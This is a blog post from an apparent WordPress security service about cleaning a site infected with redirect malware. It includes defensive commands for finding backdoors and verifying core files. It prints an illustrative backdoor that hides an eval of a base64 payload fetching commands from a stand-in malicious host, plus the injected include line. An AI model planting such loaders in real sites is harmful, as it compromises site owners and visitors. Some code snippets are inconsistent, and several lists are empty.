How We Detected and Removed Malware from a Client’s WordPress Site After a Malicious Redirect

Recently, we encountered a severe security breach on a client’s WordPress site, where visitors were being redirected to malicious websites. After a thorough investigation, we found that a hacker had injected malware directly into the WordPress core files. In this blog post, we’ll walk you through what happened, the code responsible for the attack, and the steps we took to clean up the site and secure it for the future.

Symptoms of the Attack

The client first noticed the problem when users reported being redirected to suspicious websites. The site’s SEO performance also began to drop, as search engines flagged it for harmful behavior. It was clear that the site had been compromised by malware, likely intended to steal traffic or infect users with malicious content.

How We Found the Malware

Our investigation started by examining the site’s critical WordPress files, focusing particularly on wp-config.php and the core wp-includes directory, as these are common targets for attackers.

While inspecting the wp-config.php file, we found a suspicious line that had been added to the configuration file:

[php]
include_once(ABSPATH . WPINC . '/header.php');
[/php]

This line instructs WordPress to include and execute code from a header.php file located in the wp-includes directory. However, WordPress does not normally have a header.php file in this directory, which immediately raised a red flag. This file was created by the attacker to insert malicious code that would run every time a page on the site was loaded.

Analyzing the Malicious Code

When we checked the contents of the wp-includes/header.php file, we discovered it was designed to:

This type of attack is particularly dangerous because it compromises both the site owner’s reputation and the security of visitors.

Here’s a simplified example of what the code in header.php might have looked like:

[php]
<?php
// Suppress errors to avoid detection
@ini_set('display_errors', 0);
error_reporting(0);

// Base64-encoded payload used to hide malicious code
$payload = "Z2V0X2ZpbGVfY29udGVudHMoJ2h0dHBzOi8vbWFsaWNpb3VzLXNpdGUuY29tL2NvbW1hbmQuanNvbicpOw==";

// Decode and execute the payload
eval(base64_decode($payload));
?>
[/php]

In this case, the eval() function is used to execute code that has been base64-encoded, which makes it harder to detect by security software. The encoded string could contain anything, but it often includes commands to download further malware or redirect users to another site.

How We Cleaned the Infection

1. Removing the Malicious Code

We started by removing the malicious include_once line from the wp-config.php file:

[php]
<?php
// Removed this line to prevent loading malicious code
include_once(ABSPATH . WPINC . '/header.php');
?>
[/php]

Next, we deleted the header.php file from the wp-includes directory, as this file was not part of the official WordPress installation and contained the malicious payload.

2. Checking for Additional Backdoors

Malware infections often come with multiple backdoors, so we searched the site’s directories for other suspicious files. We used the following terminal command to find any other hidden files or recently modified files:

[sourcecode language=”plain”]
find . -type f -name ".*" -o -mtime -30
[/sourcecode]

This command helped us identify any files modified in the last 30 days and any hidden files (starting with a dot .) that attackers might have placed.

3. Verifying WordPress Core Integrity

We used WordPress’s built-in functionality to verify the integrity of the core files. This command checks for any tampered WordPress files and lets us know if we need to replace any of them:

[sourcecode language=”plain”]
wp core verify-checksums
[/sourcecode]

Any core files that were modified were replaced with clean versions from the official WordPress repository.

4. Updating Passwords and Credentials

Because the attacker had gained access to the server, we took the following steps to secure the site:

5. Hardened WordPress Security

To prevent future attacks, we took several steps to harden the WordPress installation:

[php]
define('DISALLOW_FILE_EDIT', true);
[/php]

6. Monitoring for Future Attacks

Finally, we set up monitoring to track any further suspicious behavior. We also set up regular backups so that if anything happens in the future, we can restore the site quickly.

Conclusion

This incident was a clear reminder that website security should never be taken lightly. Malware infections like this not only hurt SEO and user trust but can also lead to data breaches. By regularly monitoring your site, keeping everything up to date, and using security best practices, you can minimize the chances of an attack.

If your site has been compromised or you’re seeing strange redirects, don’t wait! Take action immediately to clean your site and prevent further damage. If you’re unsure how to proceed, seek professional help to ensure everything is properly cleaned and secured.

Stay safe and secure!

Need help with your WordPress security? Contact us today for a comprehensive security audit and cleanup service.

Leave a Reply

Your email address will not be published. Required fields are marked *